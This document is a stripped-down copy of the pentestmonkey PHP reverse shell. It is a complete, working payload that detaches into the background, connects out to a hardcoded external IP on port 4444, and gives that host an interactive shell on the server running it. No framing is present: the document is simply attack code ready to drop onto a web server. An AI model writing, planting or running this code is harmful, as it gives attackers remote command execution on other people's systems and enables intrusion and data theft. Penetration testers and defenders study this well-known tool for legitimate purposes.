php-reverse-shell

1. <?php
2. // php-reverse-shell - A Reverse Shell implementation in PHP. Comments stripped to slim it down. RE: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
3. // Copyright (C) 2007 [email protected]
4.  
5. set_time_limit (0);
6. $VERSION = "1.0";
7. $ip = '190.89.10.23';
8. $port = 4444;
9. $chunk_size = 1400;
10. $write_a = null;
11. $error_a = null;
12. $shell = 'uname -a; w; id; sh -i';
13. $daemon = 0;
14. $debug = 0;
15.  
16. if (function_exists('pcntl_fork')) {
17.     $pid = pcntl_fork();
18.    
19.     if ($pid == -1) {
20.         printit("ERROR: Can't fork");
21.         exit(1);
22.     }
23.    
24.     if ($pid) {
25.         exit(0);  // Parent exits
26.     }
27.     if (posix_setsid() == -1) {
28.         printit("Error: Can't setsid()");
29.         exit(1);
30.     }
31.  
32.     $daemon = 1;
33. } else {
34.     printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
35. }
36.  
37. chdir("/");
38.  
39. umask(0);
40.  
41. // Open reverse connection
42. $sock = fsockopen($ip, $port, $errno, $errstr, 30);
43. if (!$sock) {
44.     printit("$errstr ($errno)");
45.     exit(1);
46. }
47.  
48. $descriptorspec = array(
49.    0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
50.    1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
51.    2 => array("pipe", "w")   // stderr is a pipe that the child will write to
52. );
53.  
54. $process = proc_open($shell, $descriptorspec, $pipes);
55.  
56. if (!is_resource($process)) {
57.     printit("ERROR: Can't spawn shell");
58.     exit(1);
59. }
60.  
61. stream_set_blocking($pipes[0], 0);
62. stream_set_blocking($pipes[1], 0);
63. stream_set_blocking($pipes[2], 0);
64. stream_set_blocking($sock, 0);
65.  
66. printit("Successfully opened reverse shell to $ip:$port");
67.  
68. while (1) {
69.     if (feof($sock)) {
70.         printit("ERROR: Shell connection terminated");
71.         break;
72.     }
73.  
74.     if (feof($pipes[1])) {
75.         printit("ERROR: Shell process terminated");
76.         break;
77.     }
78.  
79.     $read_a = array($sock, $pipes[1], $pipes[2]);
80.     $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
81.  
82.     if (in_array($sock, $read_a)) {
83.         if ($debug) printit("SOCK READ");
84.         $input = fread($sock, $chunk_size);
85.         if ($debug) printit("SOCK: $input");
86.         fwrite($pipes[0], $input);
87.     }
88.  
89.     if (in_array($pipes[1], $read_a)) {
90.         if ($debug) printit("STDOUT READ");
91.         $input = fread($pipes[1], $chunk_size);
92.         if ($debug) printit("STDOUT: $input");
93.         fwrite($sock, $input);
94.     }
95.  
96.     if (in_array($pipes[2], $read_a)) {
97.         if ($debug) printit("STDERR READ");
98.         $input = fread($pipes[2], $chunk_size);
99.         if ($debug) printit("STDERR: $input");
100.         fwrite($sock, $input);
101.     }
102. }
103.  
104. fclose($sock);
105. fclose($pipes[0]);
106. fclose($pipes[1]);
107. fclose($pipes[2]);
108. proc_close($process);
109.  
110. function printit ($string) {
111.     if (!$daemon) {
112.         print "$string\n";
113.     }
114. }
115.  
116. ?>